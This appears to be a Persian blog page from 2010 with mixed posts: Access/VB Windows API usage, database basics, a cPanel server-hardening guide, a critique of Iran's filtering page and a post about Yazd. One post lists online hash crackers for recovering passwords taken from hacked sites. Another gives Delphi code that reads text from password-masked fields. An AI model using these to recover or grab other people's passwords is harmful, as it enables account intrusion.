پس منتظر قسمت دوم این مقاله و تکنیکهای پیشرفته تر Hackerها در نفوذ به بانک اطلاعاتی SQL Server یک برنامه نویس ناشی و روش اجتناب از آن باشید

توضیح: برخی قسمتهای این مقاله از مقاله “از بانک اطلاعاتی خود دفاع کنید” نوشته Beth Breidenbach چاپ شده در شماره ۹ (نوامبر/دسامبر ۲۰۰۲) مجله asp.netPRO اقتباس شده است.

سوال خیلی از دوستان بود !

با تشکر از تیم امنیتی آشیانه !

استفاده از توابع API ويندوز در اكسس

نویسنده: سینا - سه شنبه سی و یکم فروردین 1389

جهت استفاده از توابع API ويندوز در قسمتهاي مختلف يك برنامه به زبان اكسس يا ويژوال بيسيك بايد الگوي تابع مورد نظر را در يك ماژول به صورت Public تعريف نماييد در اين الگو شما نام تابع و نام كتابخانه DLL كه تابع مورد نظر در آن تعريف شده را همراه با پارامترهاي ورودي/خروجي آن مشخص كنيد . همچنين ميتوانيد از يك نام دلخواه براي فراخواني تابع استفاده كنيد در اينصورت بايد نام اصلي يا مستعار تابع در كتابخانه مربوطه اش را بعد از عبارت Alias مشخص كنيد.
به عنوان مثال ShellExecuteA يكي از توابع كتابخانه اي ويندوز است كه با همين نام در كتابخانه shell32.dll تعريف شده است. با اين تابع شما قادر خواهيد بود يك فايل دلخواهتان را در محيط برنامه اي كه ويندوزتان براي آن پسوندفايل رجيستر شده، باز كنيد مثلا يك فايل PDF‌ را در محيط آكروبات.
براي استفاده از اين تابع الگوي آنرا به شكل زير در يك ماژول تعريف نماييد

Public Declare Function ShellExecuteA Lib "shell32.dll" (ByVal hwnd As Long, _

ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String,

ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

اگر بخواهيد از اين تابع با نام apiShellExecute در برنامه تان استفاده كنيد بايد به جاي الگوي فوق، الگوي زير را در ماژول استفاده كنيد.

Public Declare Function apiShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, _
ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, _
ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

حال تابعي به نام ShellExecuteA يا apiShellExecute در قسمتهاي مختلف برنامه قابل فراخواني است. در اين مرحله بايد تابع را با پارامترهاي مناسب صدا زد. مثلا به شكل زير:

Dim Lret As Long, LshowHow As Long

Dim stFile As String

LshowHow = 1

stFile = "C:\WO-Status Count8605.pdf"

Lret = ShellExecuteA (hWndAccessApp, vbNullString, stFile, vbNullString, vbNullString, LshowHow )

یا

Lret = apiShellExecute (hWndAccessApp, vbNullString, stFile, vbNullString, vbNullString, LshowHow )

کرکر های آنلاین ؟!

نویسنده: سینا - سه شنبه سی و یکم فروردین 1389

دوستانی که آشنایی بیشتری به هکینگ دارن میدونن . وقتی یه سایت یا سرور رو هک میکنیم پسورد رو به صورت رمزنگاری شده دریافت می کنیم . شما میتونید این رمز های رو به پسورد اصلی تبدیل کنید و به هدف مورد نظر که هکش کردین وارد شید ! برای این کار به Hash Cracker نیاز دارید ! این هم چند سایت Hash Cracker :

http://passcracking.com

http://gdataonline.com/seekhash.php

http://ice.breaker.free.fr

http://md5.hashcracking.com

http://md5decryption.com

http://www.hashchecker.com

http://md5crack.it-helpnet.de

http://www.md5decrypter.com

http://blacklight.gotdns.org

http://www.hashchecker.com

http://md5.ip-domain.com.cn

http://www.bigtrapeze.com

http://opencrack.hashkiller.com

http://md5live.com

http://www.md5hood.com

امیدوارم به دردتون بخوره ! با تشکر ASHIYANE !

دریافت متن از دیگر برنامه ها در دلفی

نویسنده: سینا - سه شنبه سی و یکم فروردین 1389

سوال دوستان بود ! در اینجا به نحوه ارتباط با دیگر برنامه ها در دلفی می پردازم . یک مثال ساده در پایین می تونه خیلی چیزها رو براتون روشن کنه. کاربردی که در پایین براتون عملی آوردم ، نمایش متن داخل باکس هایی است که به صورت ستاره (رمز) نمایش داده میشن ولی خودتون می تونید کاربرد هایی دیگه براش پیدا کنید.

کد نویسی برنامه بسیار آسونه ! این کار از طریق توابع API صورت میگیره . ابتدا باید شی ای که در مختصات ماوس قرار داره رو پیدا کرد ، سپس با فرستان دستور SendMessage می توان ازش متن داخلش رو دریافت کرد. در اینجا اصلا نمی خوام آموزشی بدم ، پس فقط به گذاشتن فایل اجرایی و سورس برنامه اکتفا می کنم. مطمئنا در آینده ای نزدیک بخشی رو هم برای آموزش در نظر می گیرم.

procedure TForm1.Timer1Timer(Sender: TObject);

var rPos: TPoint;

hWnd: THandle;

Text : array [0..255] of char;

begin

if boolean(GetCursorPos(rPos))then begin;

hWnd := WindowFromPoint(rPos) ;

SendMessage(hWnd, WM_GETTEXT,SizeOf(Text), integer(@Text)) ;

edit1.text := Text;

end;

end

http://blog.radmanco.ir/wp-content/uploads/2009/02/Get_Text.rar

پایگاه داده ها (بانک اطلاعاتی) چیست ؟

نویسنده: سینا - سه شنبه سی و یکم فروردین 1389

تعریف پایگاه داده ها :
مجموعهای از موجودیتهای مرتبط به هم، شامل جداول، فرمها، گزارشها، پرس و جوها و اسکریپتها که توسط یک سیستم مدیریت پایگاه دادهها(dbms) ایجاد و سازمان دهی میشوند. پایگاه دادهها تقریباً میتواند شامل هر نوع دادهای، مانند لیستی از مشترکین مجله، دادههای شخصی در مورد در مورد فضانوردان شاتل فضایی، یا مجوعهای از تصاویر گرافیکی و برشهای تصویری باشد.

پایگاه دادهها یا دادِگان ( یا بانک اطلاعاتی) به مجموعهای از دادهها با ساختار منظم و سامانمند گفته میشود. پایگاههای دادهها معمولاً در قالبی که برای دستگاهها و رایانهها قابل خواندن و دسترسی باشد ذخیره میشوند. البته چنین شیوه ذخیرهسازی اطلاعات تنها روش موجود نیست و شیوههای دیگری مانند ذخیرهسازی ساده در پروندهها نیز استفاده میگردد. مسئلهای که ذخیرهسازی دادهها در دادگان را موثر میسازد وجود یک ساختار مفهومی است برای ذخیرهسازی و روابط بین دادهها است.

پایگاه داده در اصل مجموعهای سازمان یافته از اطلاعات است.این واژه از دانش رایانه سرچشمه میگیرد ،اما کاربرد وسیع و عمومی نیز دارد، این وسعت به اندازهای است که مرکز اروپایی پایگاه داده (که تعاریف خردمندانهای برای پایگاه داده ایجاد میکند) شامل تعاریف غیر الکترونیکی برای پایگاه داده میباشد. در این نوشتار به کاربردهای تکنیکی برای این اصطلاح محدود میشود.
یک تعریف ممکن این است که: پایگاه داده مجموعهای از رکوردهای ذخیره شده در رایانه با یک روش سیستماتیک (اصولی) مثل یک برنامه رایانهای است که میتواند به سوالات کاربر پاسخ دهد. برای ذخیره و بازیابی بهتر، هر رکورد معمولاً به صورت مجموعهای از اجزای دادهای یا رویدادها سازماندهی میگردد. بخشهای بازیابی شده در هر پرسش به اطلاعاتی تبدیل میشود که برای اتخاذ یک تصمیم کاربرد دارد. برنامه رایانهای که برای مدیریت و پرسش و پاسخ بین پایگاههای دادهای استفاده میشود را مدیر سیستم پایگاه دادهای یا به اختصار (dbms) مینامیم. خصوصیات و طراحی سیستمهای پایگاه دادهای در علم اطلاعات مطالعه میشود.
مفهوم اصلی پایگاه داده این است که پایگاه داده مجموعهای از رکوردها یا تکههایی از یک شناخت است.نوعا در یک پایگاه داده توصیف ساخت یافتهای برای موجودیتهای نگه داری شده در پایگاه داده وجود دارد: این توصیف با یک الگو یا مدل شناخته میشود. مدل توصیفی، اشیا پایگاههای داده و ارتباط بین آنها را نشان میدهد. روشهای متفاوتی برای سازماندهی این مدلها وجود دارد که به آنها مدلهای پایگاه داده گوییم. پرکاربردترین مدلی که امروزه بسیار استفاده میشود، مدل رابطهای است که به طور عام به صورت زیر تعریف میشود: نمایش تمام اطلاعاتی که به فرم جداول مرتبط که هریک از سطرها و ستونها تشکیل شده است(تعریف حقیقی آن در علم ریاضیات برسی میشود). در این مدل وابستگیها به کمک مقادیر مشترک در بیش از یک جدول نشان داده میشود. مدلهای دیگری مثل مدل سلسله مراتب و مدل شبکهای به طور صریح تری ارتباطها را نشان میدهند.
در مباحث تخصصی تر اصطلاح دادگان یا پایگاه داده به صورت مجموعهای از رکوردهای مرتبط با هم تعریف میشود. بسیاری از حرفهایها مجموعهای از دادههایی با خصوصیات یکسان به منظور ایجاد یک پایگاه دادهای یکتا استفاده میکنند.
معمولاً Dbmsها بر اساس مدلهایی که استفاده میکنند تقسیم بندی میشوند: ارتباطی،شی گرا، شبکهای و امثال آن. مدلهای دادهای به تعیین زبانهای دسترسی به پایگاههای داده علاقه مند هستند. بخش قابل توجهی از مهندسی Dbms مستقل از مدلهای میباشد و به فاکتورهایی همچون اجرا، همزمانی،جامعیت و بازیافت از خطاهای سخت افزاری وابسطه است.در این سطح تفاوتهای بسیاری بین محصولات وجود دارد.

منبع : ویکی پدیا

تاریخچه پایگاه داده

تاریخچه پایگاه داده

اولین کاربردهای اصطلاح پایگاه داده به June 1963 باز میگردد، یعنی زمانی که شرکت System Development Corporation مسئولیت اجرایی یک طرح به نام "توسعه و مدیریت محاسباتی یک پایگاه دادهای مرکزی" را بر عهده گرفت. پایگاه داده به عنوان یک واژه واحد در اوایل دهه 70 در اروپا و در اواخر دهه 70 در خبر نامههای معتبر آمریکایی به کار رفت.(بانک دادهای یا Databank در اوایل سال 1966 در روزنامه [[[[تصویر:تصویر:واشینگتن]] پست]] کار رفت)

[[تصویر:اولین سیستم مدیریت پایگاه داده در دهه 60 گسترش یافت. از پیشگامان این شاخه چارلز باخمن میباشد. مقالات باخمن این را نشان داد که فرضیات او کاربرد بسیار موثرتری برای دسترسی به وسایل ذخیره سازی را محیا میکند. در آن زمانها پردازش داده بر پایه کارتهای منگنه و نوارهای مغناطیسی بود که پردازش سری اطلاعات را مهیا میکند. دو نوع مدل دادهای در آن زمانها ایجاد شد:CODASYL موجب توسعه مدل شبکهای شدکه ریشه در نظریات باخمن داشت و مدل سلسله مراتبی که توسط North American Rockwell ایجاد شد و بعدا با اقباس از آن شرکت IBM محصولIMS را تولید نمود.
]] مدل رابطهای توسط E. F. Codd در سال 1970 ارائه شد.او مدلهای موجود را مورد انتقاد قرار میداد. برای مدتی نسبتاً طولانی این مدل در مجامع علمی مورد تایید بود. اولین محصول موفق برای میکرو کامپیوترها dBASE بودکه برای سیستم عامل هایCP/M و PC-DOS/MS-DOS ساخته شد. در جریان سال 1980 پژوهش بر روی مدل توزیع شده (distributed database) و ماشینهای دادگانی (database machines) متمرکز شد، اما تأثیر کمی بر بازار گذاشت. در سال 1990 توجهات به طرف مدل شی گرا(object-oriented databases) جلب شد. این مدل جهت کنترل دادههای مرکب لازم بود و به سادگی بر روی پایگاه دادههای خاص، مهندسی داده(شامل مهندسی نرم افزار منابع) و دادههای چند رسانهای کار میکرد.

در سال 2000 نوآوری تازهای رخ داد و دادگان اکسامال (XML) به وجود آمد. هدف این مدل از بین بردن تفاوت بین مستندات و دادهها است و کمک میکند که منابع اطلاعاتی چه ساخت یافته باشند یا نه در کنار هم قرار گیرند.

ادامه در ادامه مطلب ...

ادامه مطلب ...

امنیت در Cpanel

نویسنده: سینا - دوشنبه سی ام فروردین 1389

کلمات عبور ساده بزرگترين مشکل امينتي را براي سرور شما به وجود مي آورند. داشتن کلمات عبور امن و پيچيده (چه براي خود سرور و چه براي کاربراني که روي سرور قرار دارند) بسيار با اهميت است.به عنوان مثال اگر کاربر شما ازکلمه ي عبور ي استفاده کند که به راحتي توسط هکر ها قابل حدث زدن باشد در وحله ي اول باعث deface شدن سايت خود شده و اعتبار شرکت شما رو زير سوال مي برد دوم ممکن است از طريق اين سايت براي ارسال ويروس و هرزنامه استفاده بشه يا بويسله ي local exploit ها به بقيه سايت ها آسيب برسونه.
* شما مي تونيد با ويرايش تنظيمات مربوط به کلمات عبور در فايل /etc/login.defs بر اساس نوع کار شما با سرور و درجه ي امنيتي که براي خود در نظر مي گيريد کاربران مجبور به داشتن کلمات عبور ايمن کنيد.توضيحات کامل در مورد هر يک از پارامتر هاي فايل login.defs داخل خود فايل و در بالاي هر کدام از پارامتر ها موجود مي باشد.
معمولا کلمات عبور بايد حداقل 8 حرفي و شامل حرف - عدد و علائم باشند. هيچ وقت از کلمات معني دار يا تاريخ هاي مهم استفاده نکنيد. اگر مي خواهيد امن بودن کلمه عبور خود را بررسي کنيد مي تونيد اون را با استفاده از اين نرم افزارتستwww.openwall.com کنيد . اگر ظرف ? - ? ساعت کلمه عبور شما crack شد يعني کلمه عبور شما امن نيست.
همين سايت يک ابزار ديگه براي بررسي طول کلمات عبور کاربران سرور ساخته است بوسيله ي http://www.openwall.com/passwdqcمي توانيد ليست کاربراني که از کمات عبور نا امن استفاده ميکنند را پيدا کنيد و به آنها هشدار دهيد .

2- پروتکل SSH شما Secure است؟
سعي کنيد هميشه از براي ورود به سرور از public key authentication استفاده کنيد وهيچ وقت دسترسي SSH را براي عموم باز نگذاريد. اگر ازputtyاستفاده مي کنيد مي توانيد نرم افزار putty agent را نصب کرده و key هاي SSH خود را مديريت کنيد.
هميشه پورت SSH را عوض کنيد .معمولا طرف ابتدا به دنبال پورت 22 مي گرده و اگر اطلاعات کافي در مورد سرور شما نداشته باشه از دسترسي به ssh نا اميد خواهد شد . لذا هيچ وقت ssh را روي پورت 22 باز نگذاريد. مي توانيد پورت ssh را از طريق ويرايش فايل etc/ssh/sshd_config به يک پورت باز ديگر مثلا ???? تغيير دهيد. port 1654
از پروتکل 2 استفاده کنيد . اگر از putty استفاده مي کنيد اين نرم افزار قابليت پشتيباني از هر دو پروتکل را دارست پس نگراني وجود ندارد . در همين فايل etc/ssh/sshd_config مي توانيد خط Protocol 2. را تايپ کنيد.
در اکثر سيستم هاي لينوکس ميتوانيد محدوديت هايي را روي دستري هاي shell اعمال کنيد . با استفاده از تنظيماتي که در /etc/security/limits.conf وجود دارد مي توانيد محدوديت هاي بسيار جالب را براي تک تک کاربران shell ايجاد کنيدتا استفاده ي نابجاي آنها با استفاده وارد آوردن فشار بيش از حد به سرور شما و down شدن آن نشود .

3- وب سرور خود را secure کنيد
مهمترين قسمتي که با عموم کاربران در ارتباط است و بيشتر مورد حمله و نفوذ قرار مي گيرد همان webserver است .
يکي از بهترين ماژول هايي که براي جلوگيري از استفاده ي نابجا از وب سرور استفاده مي شود mod_security است که در همين وب لاگ بار ها در موردش صحبت کرديم. البته خود اون فقط يک ابزاره و بقيش برميگرده به هنر مدير سرور در طراحي يک سري rule مناسب مخصوص اون سرور براي اطلاعات بيشتر به سايت هاي http://www.modsecurity.org و http://www.gotroot.com سر بزنيد.
توجه کنيد که هميشه موقع compile کردن apache گزينه ي suexec حتما فعال باشد. فعال کردن اين گزينه به معني اجرا شدن اسکريپت هاي CGI تحت owner خود (مالک فايل) مي باشد. اين گزينه باعث جلوگيري از دسترسي فايل هاي CGI به فايل هاي سيستم ميشه و همچنين براي جلوگيري از فايل هايي که باعث در سرور مي شود بسيار مناسب است.
همچنين بعضي ها اعتقاد داند که بايد PHPsuexec هم روي سرور فعال باشه اين گزينه باعث ميشه که فايل هاي php هم تحت کاربر خودشون اجرا بشن و با عث بالا بردن امنيت فايل هاي سيستمي و جلوگيري از استفاده نا بجا از اين گونه اسکريپت ها ميشه .
مي تونيد apache رو بوسيله ي دستور /scripts/easyapach که به شما محيط نيمه گرافيکي ميده يا با استفاده از خود whm که محيط کاملا گرافيکي داره compile کنيد.
با استفاد از فعال کردن گزينه ي open_basedir در قسمت Tweak Security در WHM دسترسي کاربران را از مشاهده ي فايل هايي که خارج پوشه ي مربوط به خودشون هست بگيريد.
اگر خيلي از امنيت سرور خود حراس داريد و نمي توانيد تک تک دسترسي ها مسدود کنيد مي توانيد به راحتي در فايل php.ini گزينه ي safe mode را فعال کنيد . Safe_mode=on اين گزينه هر لحظه چکميکنه که آيا کسيکه داره اين فايل رو اجرا ميکنه مالک اون قسمتهست يا نه و خيلي دستورات را خود به خود مسدود ميکنه . و راحت ترين راه براي بستن دسترسي هاي اضافي روي سروره . البته بايد گم که با فعال کردن اين گزينه حدود 60 درصد از scriptها و کاربران به مشکل برمي خورند.

4- پارتيشن tmp را secure کنيد
بله . مخصوصا گفتم پارتيشن چون بعضي ها اصلا براش partision نمي سازند . البته اگر سرورتون را از يک ديتا سنتر درست حسابي گرفته باشيد خودشون موقع نصب سيتم عامل اين کار رو انجام ميدن.
ولي بازهم کافي نيست در قسمت fstab سيستم بايد tmp حتما با گزينه ي nosetuid بسازيد يا به اصطلاح mount کنيد. اين گزينه باعث ميشه که تک تک proccess ها با سطح دسترسي executor اجرا شوند .اين سطوح دسترسي قبلا در کرنل لينوکس تعريف شده. همچنين بعد از نصب cpanel مي توانيد گزينه ي noexec رو هم فعال کنيد. اين گزينه باعث ميشه که هيچ فايل اجرايي داخل tmp اجازه ي اجرا شدن نداشته باشه . بعد از اينکه اين کار و انجام داديد بوسيله script از پيش آماده ي خود cpanel در آدرس /scripts/securetmp براي پارتيشن tmp خود يک symlink يا شبه لينک به /var/tmp بسازيد اين خودش براي حفظ امنيت tmp موثره .

5- غير فعال کردن compiler ها براي کاربران ديگر
99 درصد کاربران نمي دونن compiler ها روي هاست به چه درد مي خوه و اصلا استفاده اي از اونها ندارند پس چه بهتره براي همه ي کاربراني که استفاده ندارند اون رو disable کنيد . اين کار رو مي تونيد در whm در قسمت Compilers Tweak انجام بديد . اکثر باگ هاي امينتي کشف شده نيار دارند تا همون موقع روي سرور compile بشن با غير فعال کردن اون حال بسياري از هکر ها رو ميگيريد.

6- از maildir به جاي mailbox استفاده کنيد
ما دونوع ذخيره سازي روي لينوکس داريم براي ايميل ها . اولي به صورت mail box هست و دومي maildir که گزينه ي دوم بسيار از لحاظ امنيتي بهتره و باعث افزايش سرعت ميل سرورتون هم ميشه . البته در نسخه ي جديد cpanel به صورت پيش فرض maildir نصب ميکنه ولي اگر سرورتون بيش از يک سال عمر داره و روش خاک نشسته بهتره همين حالا به maildir ارتقا بديد. قبلش از اطلاعاتتون backup بگيريد . بنده هيچ مسئوليتي در قبل از دست دادن اونها ندارم . مي تونيد از پشتيباني ديتا سنترتون بخوايد تا اين کار رو انجام بده.

7- سرويس هاي اضافي(services and daemons) را غير فعال کنيد
هر سرويس که روي سرور شما فعال باشه و به ديگران اجازه ي وصل شدن به اون وگرفتن اطلاعات به کاربران ميده داراي باگ امينتي هست و اگر از اون استفاده نمي کنيد بايد اون رو ببنديدش . خود لينوکس هم يک سري سرويس هاي زائد(daemons) داره که براي يک سريس دهنده ي وب نيازي به اونها نيست .
سرويس هاي رو مي تونيد در /etc/xinetd.con ويرايش کنيد .براي مثال سيستم اشتراک فايل (nfs/statd) يا سيستم مديريت پرينت (cupsd) و خيلي daemonهاي ديگه که توي آموزش مختصر مثل اين نمي گنجه همش روبگم. از داخل whm در قسمت Service Manager مي تونيد سرويس هايي که نيار نداريد رو غير فعال کنيد . مثلا اگر از chat server خود cpanel استفاده نمي کنيد اون رو غير فعالش کنيد چون خودش باعث مشکلاتي امنيتي خواهد شد .
اين بخش از مهمترين کار هايي که بايد يک مدير سرور انجام بده .

8- سرور خود را تحت کنترل داشته باشید

یک مدیر سرور باید به صورت 24 ساعته کلیه قسمت های سرور (نرم افزار ها - فایل های کاربران و ...) را تحت کنترل داشته باشد
اینکه نرم افزار های مورد استفاده روی سرور بروز هستند یا خیر و خیلی مسائل دیگر بسیار مهم هستند که این امر فقط با بررسی مداوم و سرکشی به صورت روزانه روی سرور ها عملی است.
البته اگر زرنگ باشید می تونید حداقل 90 درصد این کار ها را با نوشتن script های دلخواه انجام دهید و شما فقط لوگ های مربوطه را چک کنید و فقط در مواقع ضروری روی سرور لوگین کنید . در این جا برخی از command های پر استفاده رو در این ضمینه ارائه می کنم:

netstat -anp : لیست کلیه connection های باز سرور را به شما می دهد تا به دنبال پورت ها یا نرم افزار های مشکوکی که روی سرور run هستند ولی شما اجاره اجرا شدن به انها نداده اید مشاهده کنید و در صورت لزوم بوسیله firewall دسترسی انها را مسدود کنید.

find / $ -perm -a+w $ ! -type l >> world_writable.txt : این دستور لیست کلیه فایل هایی را که permission 777 دارند و توسط کلیه کاربران روی سرور قابلیت ویرایش دارند را به شما نشان میدهد (داخل فایل txtذخیره می کند) اکثر مشکلات امینی داخل همین فولدر ها اتفاق می افتد.

ls /var/log/ : اکثر لوگ فایل ها داخل پوشه var هستند شما در صورت نیاز به لوگی از از هر سرویس خاصیمی توانید در این فولدر به آن مراجعه کنید (البته لوگ های apache در فولدر /usr/local/apache/logs هست)

در کنار تمامی موارد script های زیادی هستندکه به شما در این کار ها کمک می کنند . البته چیزی که بر حسب نیاز خودتون برای خودتون بنویسید مسلما یک چیز دیگس. یک سری برنامه ها اسمشون رو می نویسم که به درد می خورند .

Tripwire - این نرم افزاری هست که md5 کلیه فایل های مربوط به سیستم را چک می کنه و در صورتی که این فایل ها تغییر کند به شما هشدار می دهد.
http://sourceforge.net/projects/tripwire OR http://tripwire.com
Chrookit - نرم افزاری برای پیدا کردن trojan - backdoor و غیره بر روی سرور.
http://www.chkrootkit.org
Rkhunter - نرم افزاری برای پیدا کردن trojan - backdoor و غیره بر روی سرور.
http://www.rootkit.nl/projects/rootkit_hunter.html
Logwatch - نرم افزاری برای بررسی لوگ ها و فعالیت های سرور به صورت روزانه و تهیه گزارش کامل برای شما
http://logwatch.org

9- حتما یک firewall نرم افزاری داشته باشید !!

اگر firewall سخت افزاری هم دارید باید یک فایروال جداگانه روی سرور داشته باشید . با استفاده از firewall می تونید لیست پورت هایی که استفاده نمی شوند رو محدود کنید و با این کار حجم زیادی از نرم افزار های backdoor و ... را از کار بیاندازید . همچنین با استفاده از firewall می توانید ادرس های ip خاصی را block کنید و حتی در مقابل حملات dos اسیب ناپذیر باشید.
در زیر لیست پورت های مورد نیاز cpanel امده است( اگر سرویس دیگری ندارید می توانید بقیه پورت ها را به غیر از این ها ببندید . چون نیازی به انها ندارید ) : http://faq.cpanel.net/show.cgi?qa=10468918040763
بهترین firewall از نظر من روی cpanel هم نصب میشه و خوب جواب میده همون APF هست که با rule های خود لینوکس iptables کار می کنه.

10 - بروز باشید !!
80 در صد مشکات امینتی در روز های اول عمرشون براشون patch و update امنیتی میاد یعنی یک bug هرچقدر هم که underground باشه بالاخره براش patch میاد پس سعی کنید که همیشه از اخرین نسخه های نرم افزار استفاده کنید . نسخه ی کرنل حداقل هز 2 ماه یک بار باید بروز بشه بقیه نرم افزار ها باید هر هفته چک بشن و در صورت لزوم update بشن. خود cpanel باید هر روز update بشه . چون هر روز داره نسخه های جدید ارائه می کنه.

سوال خیلی از دوستان و وبمستر های عزیز بود . موفق باشید و امیدوارم استفاده کنید

نقدی بر صفحه جدید فیلترینگ

نویسنده: سینا - جمعه بیستم فروردین 1389

از ابتدای سال 89 کاربران ایرانی شاهد تغییراتی در صفحه فیلترینگ بودند، در صفحه جدید علاوه بر نمایش پیامی درباره عدم دسترسی به سایت درخواست شده پیام تبریک سال نو نیز نمایش داده می شود و اما مهمترین بخش این صفحه جدید نمایش لینک دهها سایت ایرانی است. به نظر میرسد که طراحان صفحه جدید فیلترینگ به نوعی قصد حمایت از سایتهای ایرانی را دارند و احتمالا قصد دارند که کاربر ایرانی را که به دلیلی قصد مشاهده سایتی فیلترشده را داشته دعوت به استفاده از سایتهای مفید ایرانی کنند. اما آنچه در صفحه جدید فیلترینگ صورت گرفته است به دلایلی که در ادامه اشاره خواهد شد به نوعی حقوق کاربران و مدیران سایتهای ایرانی را نقض کرده است.
در سپتامبر 2003 شرکت خصوصی VeriSign که اپراتور و پیمانکار ثبت دامنه های com. , .net است تلاش کرد تا به جای درخواستهای کاربران برای مشاهده دامنه هایی که هنوز ثبت نشده بودند ایشان را به پرتال خود به نام Site Finder راهنمایی کند و فهرستی از سایتهای مشابه و فعال را به کاربر نمایش می داد. این مسئله خیلی زود باعث واکنش آیکان (ICANN ) شد و VeriSign مجبور شد در فاصله کوتاهی این سرویس خود را غیرفعال کند. اگرچه شاید ایده VeriSign مورد پسند برخی کاربران نیز واقع شد اما مشخص است که همانطور که آیکان نیز واکنش نشان داد حقوق کلی کاربران و مفاهیم اولیه اینترنت را نقض می کند.
آنچه در بسیاری از کشورها به عنوان قانون وجود دارد و حتی در کشور ما نیز در آیین نامه ها و قوانین مرتبط با سرویس دهندگان اینترنت به صورت تلویحی اشاره شده است عدم دستکاری در اطلاعات درخواستی کاربران توسط شرکتهای سرویس دهنده است. نمایش یک سایت یا صفحه ای از یک سایت به جای درخواست کاربر برای مشاهده سایتی دیگر نقض حقوق کاربر است. البته طبیعی است که شرکتهای سرویس دهنده میتوانند براساس قوانین دسترسی کاربران را به یک سایت را مسدود کنند اما این حق را ندارند که سایت دیگری را به جای سایت درخواستی کاربر نمایش دهند.
وقتی در مورد صفحه فیلترینگ صحبت می کنیم از سایت یا یک پرتال صحبت نمی کنیم، کارکرد صفحه فیلترینگ نمایش پیام و آگاه سازی کاربر از عدم امکان دسترسی به یک آدرس خاص و احتمالا اطلاعاتی برای پیگیری فیلترینگ اشتباه است.نمایش صفحه ای که بیشتر شبیه یک پرتال است به جای پیام مسدود بودن یک آدرس عملا تغییر در ماهیت و محتوای درخواستی کاربر است.در نظر بگیرد که میتوان با همین استدلال در فردا روزی مثلا در پاسخ به درخواست کاربری برای دیدن گوگل یک سایت وطنی نمایش داده شود که مطمئناً این قضیه بر خلاف قوانین آیکان است.
اگر فرض کنیم که سیاستی که باعث طراحی صفحه جدید فیلترینگ شده است حمایت از سایتهای ایرانی است عملا نمایش صفحه ای با چند لینک محدود از سایتهای ایرانی عملا دخالت آشکار دولت در رقابت سالم سایتها در جذب کاربر است. توجه کنید که مشخص نیست که سایتهای لینک شده در این صفحه (که دو سایت نگارنده مطلب نیز در بین آنهاست) بر چه اساسی انتخاب و براساس چه معیاری رتبه بندی شده و در فهرست سایتها نمایش داده می شوند. بطور مثال چه معیاری در انتخاب سایتهای خبری بوده است؟ و یا چگونه سایتی با موقعیت، ترافیک و کاربران بسیار بالاتر از سایتی دیگر در فهرست لینکها پایین تر از آن سایت قرار دارد یا حتی در فهرست نیست؟ آیا این موضوع دخالت دولت در رقابت سایتهای ایرانی نیست؟ آیا از محتوای صفحه اینگونه برداشت نمی شود که دولت تلاش دارد که کاربران را تشویق به استفاده از سایتهایی ایرانی اما با سلیقه خود کند؟ همچنین آیا قابل تصور نیست که در آینده سایت طراحی شده فرد یا نهادی از داخل دولت یا وابسته به نهادهای نیمه دولتی و یا حتی با داشتن دوستانی در دولت یا نهاد طراحی کننده صفحه فیلترینگ به سادگی وارد این صفحه شده و حتی در جایگاهی بالاتر از سایتهای قدیمی تر قرار گیرد ؟
حال اجازه دهید مثال دیگری را بررسی کنیم و در واقع از بعدی دیگر به کارکرد این صفحه جدید نگاه کنیم! همانطور که شاهد هستیم در موارد متعددی سایتهای ایرانی حال به دلایل اشتباهات کوچک و یا در شرایط خاص بصورت موقت فیلتر شده اند. مدیران بسیاری از این سایتها پیگیریهای لازم را به عمل آورده و سایت ایشان پس از مدتی مجددا باز شده است حال فرض کنید که یک سرویس وبلاگ، سایت شبکه اجتماعی یا حتی یک سایت خبری یا جستجوگر که مدتی فعالیت کرده و کاربرانی را جذب کرده است به دلایلی به صورت موقت مسدود می شود در این شرایط و با توجه به صفحه جدید فیلترینگ عملا کاربران این سایت به سمت سایتهای جایگزین که در صفحه فیلترینگ به آن اشاره شده روانه خواهند شد و سایت فیلتر شده نه تنها برای مدتی از بازدیدکنندگان و کاربران خود محروم می شود بلکه آنها را به سایت رقیب خود واگذار می کند! اینجا دیگر مفهوم حمایت از سایتهای ایرانی در برابر سایتهای خارجی یا سایتهای ایرانی با سوء نیت نیست بلکه حقوق یک سایت ایرانی دیگر نقض می شود.
نمایش یک پرتال به جای پیام مسدود سازی میتواند بدعتی باشد که شرکتهای سرویس دهنده اینترنت آنرا به شکلی دیگر دنبال کنند. قابل تصور است که وقتی دولت به جای پیام آگاه سازی از مسدود بودن دسترسی به یک سایت مجموعه از لینک یا حتی سایت پرتال خود را تبلیغ می کند چرا سرویس دهندگان اینترنت بخصوص در بخش خصوصی از این صفجه (که همه ما میدانیم از بازدید بالایی برخوردار است) استفاده نکنند؟ چه جایی بهتر برای تبلیغ خدمات و یا سایتهای پیاده سازی شده توسط این شرکتها! و اصولا بعید نیست که سرویس دهندگان اینترنت به این صفحه به عنوان فرصتی برای جذب تبلیغات و کسب درآمد نگاه کنند و موافقید که این روند با حقوق کاربران اینترنت همخوانی ندارد و البته چه کسی می‌خواهد با این عملکرد شرکتهای سرویس دهنده مخالفت کند و آیا دولت که خود چنین کرده این توانایی را خواهد داشت؟
در نهایت آنکه به عنوان مدیر دو سایت مطرح ایرانی که حداقل در صفحه جدید فیلترینگ به آنها اشاره شده است معتقدم صفحه فیلترینگ جایی برای حمایت از سایتهای ایرانی نیست، تجربه چند ساله نشان داده است سایتهای ایرانی حتی نیازی به چنین حمایتهایی ندارند و معتقدم عدم دخالت دولت در رقابت سالم بین سایتهای ایرانی خود بالاتر از هر حمایت دیگری است.

یزد، دومين شهر تاريخي جهان در دل کویر

نویسنده: سینا - دوشنبه شانزدهم فروردین 1389

قول داده بودم درباره یزد بنویسم :

يزد با مردماني شكيبا و كم توقع
به گمان من، شهري چون يزد را تنها مردماني شكيبا و كم توقع مي توانسته اند بنا نهاده و آن را از پس قرون و اعصار متمادي همچنان پا بر جاي نگاه دارند. چرا كه آنان، مردماني پيوسته در معرض خطرات ناشي از آب و هواي بي نهايت گرم و خشك در تابستان و بي نهايت سرد و خشك در زمستان و همچنين خطرات ناشي از كمبود شديد آب و توفان هاي شن و فقدان بارندگي بوده اند.

